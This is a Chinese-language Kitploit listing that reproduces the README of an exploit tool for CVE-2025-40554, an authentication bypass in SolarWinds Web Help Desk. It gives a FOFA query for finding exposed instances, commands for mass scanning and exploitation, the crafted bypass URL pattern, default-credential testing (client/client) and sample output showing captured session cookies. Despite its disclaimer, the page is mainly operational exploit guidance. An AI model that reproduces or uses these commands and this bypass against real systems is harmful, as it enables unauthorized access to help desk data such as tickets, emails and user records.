Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-40554 — CVE-2025-40554 漏洞利用 | Kitploit
工具/GitHubGitHub/skynoxk/cve-2025-40554
侦察漏洞分析漏洞利用Web应用程序漏洞利用信息收集渗透测试身份验证
GitHubskynoxk/cve-2025-40554

CVE-2025-40554

CVE-2025-40554 漏洞利用

查看仓库
27个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-40554 利用套件

一个用于检测和利用 SolarWinds Web Help Desk 中认证绕过漏洞(CVE-2025-40554 / CVE-2025-40536)的综合安全测试工具。

⚠️ 免责声明

仅供教育及授权安全测试使用

本工具仅用于对您拥有或已获得明确书面授权的系统进行安全研究、渗透测试和漏洞评估。未经授权访问计算机系统是违法的。作者不对因使用本工具造成的误用或损害负责。

🔍 漏洞概述

CVE-2025-40554 是 SolarWinds Web Help Desk 中的一个严重认证绕过漏洞,允许未认证的攻击者:

  • 绕过认证机制
  • 访问特权管理功能(认证)
  • 枚举系统配置

受影响版本

  • SolarWinds Web Help Desk(具体版本信息请核实)
  • 请查看 SolarWinds 安全公告以获取已修复版本

🚀 功能特性

自行探索 :))

依赖项:

  • Python 3.6+
  • requests 库
  • urllib3 库

🛠️ 安装

root@kitploit:~
# 克隆或下载脚本
wget https://raw.githubusercontent.com/username/repo/main/CVE-2025-40554.py

# 赋予执行权限
chmod +x CVE-2025-40554.py

📖 FOFA

root@kitploit:~
("Web Help Desk") && (icon_hash="1895809524" || icon_hash="804130677")

📖 用法

基本扫描(单个目标)

root@kitploit:~
# 简单漏洞检查
python3 CVE-2025-40554.py -t https://target:8443

# 显式指定协议
python3 CVE-2025-40554.py -t https://203.106.221.203:8443

完整利用模式

root@kitploit:~
# 完整利用并枚举会话
python3 CVE-2025-40554.py -t https://target:8443 --exploit

# 跳过默认凭据测试
python3 CVE-2025-40554.py -t https://target:8443 --exploit --no-login

批量扫描

root@kitploit:~
# 从文件扫描多个目标
python3 CVE-2025-40554.py -l targets.txt

# 批量扫描并利用
python3 CVE-2025-40554.py -l targets.txt --exploit

# 静默模式(最小输出)
python3 CVE-2025-40554.py -l targets.txt -q

# 自定义输出文件
python3 CVE-2025-40554.py -l targets.txt -o results.txt

目标文件格式

targets.txt:

root@kitploit:~
https://target1:8443
https://target2.example.com:8443
192.168.1.100:8443
target3.local:8443
# 支持注释

🎯 命令行选项

📊 输出示例

成功利用

root@kitploit:~
╔═══════════════════════════════════════════════════════════════════╗
║     CVE-2025-40554 - SolarWinds Web Help Desk                    ║
║     认证绕过利用工具                                              ║
║     仅用于研究与教育目的                                          ║
╚═══════════════════════════════════════════════════════════════════╝

======================================================================
目标: https://203.106.221.203:8443
======================================================================
[*] 步骤 1: 建立会话...
[+] 提取到 WOSID: AbCdEfGhIjKlMnOpQrStU
[+] XSRF 令牌: abc123-def456-ghi789

[*] 步骤 2: 测试认证绕过...
[+] 发现绕过指示器: externalAuthContainer, JSONRpcClient, SAML 2.0
[+] 存在漏洞 - 已确认认证绕过!

[*] 步骤 3: 测试默认凭据 (client/client)...
[+] 成功 - 默认凭据有效!

======================================================================
利用模式 - CVE-2025-40554 认证绕过
======================================================================

[*] 绕过 URL: https://203.106.221.203:8443/helpdesk/WebObjects/Helpdesk.woa/wo/bogus.wo/AbCdEfGhIjKlMnOpQrStU/1.0?badparam=/ajax/&wopage=LoginPref
[*] 触发认证绕过...
[+] 认证绕过成功!

[*] 会话 Cookies:
  wosid = AbCdEfGhIjKlMnOpQrStU
  XSRF-TOKEN = abc123-def456-ghi789

======================================================================
摘要
======================================================================
[+] 目标存在 CVE-2025-40554 漏洞
[+] 默认凭据: 有效
======================================================================

批量扫描结果

root@kitploit:~
[*] 从 targets.txt 加载了 5 个唯一目标
[*] 模式: 绕过 + 默认凭据测试
[*] 完整利用已启用

[1/5] 测试 https://target1:8443
[+] 存在漏洞 - 已确认认证绕过!
[+] 成功 - 默认凭据有效!

[2/5] 测试 https://target2:8443
[!] 无漏洞 - 认证绕过失败

...

======================================================================
扫描摘要
======================================================================
总计扫描:     5/5
存在漏洞:     2
存在默认凭据: 1
======================================================================

[+] 结果已保存至: vulnerable_targets.txt

🔧 技术细节

利用流程

  1. 会话建立

    • 连接到 WHD 实例
    • 从多个来源提取 WOSID(WebObjects 会话 ID)
    • 捕获 XSRF 令牌(如果存在)
  2. 认证绕过

    • 构造包含 WOSID 注入的恶意 URL
    • 利用 WebObjects 路由中的路径遍历
    • 绕过身份验证检查
  3. 凭据测试(可选)

    • 解析带有 CSRF 保护的登录表单
    • 测试默认凭据(client/client)
    • 验证认证是否成功
  4. 完整利用(--exploit 模式)

    • 导出会话 cookies
    • 访问电子邮件、工单、数据库、用户(已移除)

漏洞指示器

该工具通过检查以下内容来检测是否成功绕过:

  • externalAuthContainer - 外部认证配置
  • JSONRpcClient - API 客户端暴露
  • SAML 2.0 - SSO 配置
  • LoginPref - 登录偏好设置
  • authMode - 认证模式设置

🤝 贡献

欢迎贡献……

📚 参考

  • CVE-2025-40554 详情
  • CVE-2025-40536 详情
  • SolarWinds 安全公告
  • WebObjects 框架文档

📄 许可证

本工具按“现状”提供,不附带任何形式的明示或暗示保证。使用风险自负。

👤 作者

Skynoxk


请记住:始终以合乎道德和法律的方式进行黑客攻击。未经授权访问是犯罪行为。

下载工具
选项描述
-t, --target URL要测试的单个目标 URL
-l, --list FILE包含目标列表的文件(每行一个)
--exploit启用完整利用模式并枚举
--no-login跳过默认凭据测试
-o, --output FILE易受攻击目标的输出文件(默认:vulnerable_targets.txt)
-q, --quiet最小输出模式(适用于批量扫描)